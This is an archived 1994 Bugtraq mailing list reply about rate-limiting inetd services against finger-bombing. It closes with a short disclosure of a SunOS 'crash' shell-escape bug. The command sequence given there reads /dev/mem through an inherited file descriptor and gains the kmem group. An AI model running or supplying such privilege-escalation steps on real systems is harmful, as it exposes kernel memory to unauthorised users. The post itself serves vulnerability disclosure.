|
Bugtraq
mailing list archives
Re: finger-bombing, abuse timeout
From: chowes () helix net (Charles Howes)
Date: Thu, 13 Oct 1994 21:39:46 -0700 (PDT)
On Wed, 12 Oct 1994, That Whispering Wolf... wrote:
This does bring up an interesting idea for improvements to xinetd/inetd
or whatever, though -- Why not have a config option that you can set so
that if more than X number of requests for Y service were received from
Z host in A time, the service shut off requests from that host for
5/10/15 minutes. Would that feature really be useful, and be worth the
overhead? Personally, -I- don't think so, but if your site comes under
regular attacks from such things, it may be a handy feep to have. Now, if
someone would just code it. *grin*
Think it's been done already for some services like 'rusers'. Mind
you, this is just a rumor. Your milage may vary.
(In other words, I don't know if it's an rusers thing, an RPC thing,
a portmapper thing, or an inetd thing.)
I *do* know that init does it for respawning gettys. So, if a
hardware failure causes getty to quit repeatedly, it doesn't chew cpu
time.
ObBug: The shell escape from 'crash' on SunOS... file descriptors are
left open to /dev/kmem and /dev/mem, among other things.
% crash
dumpfile = /dev/mem, ....
!/bin/sh
% strings <&9 >/tmp/out &
% id
.... egid=2(kmem) ....
Ooops. I understated the problem.
--
Charles Howes -- chowes () helix net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
 By Date 
By Thread
Current thread:
|
Intro
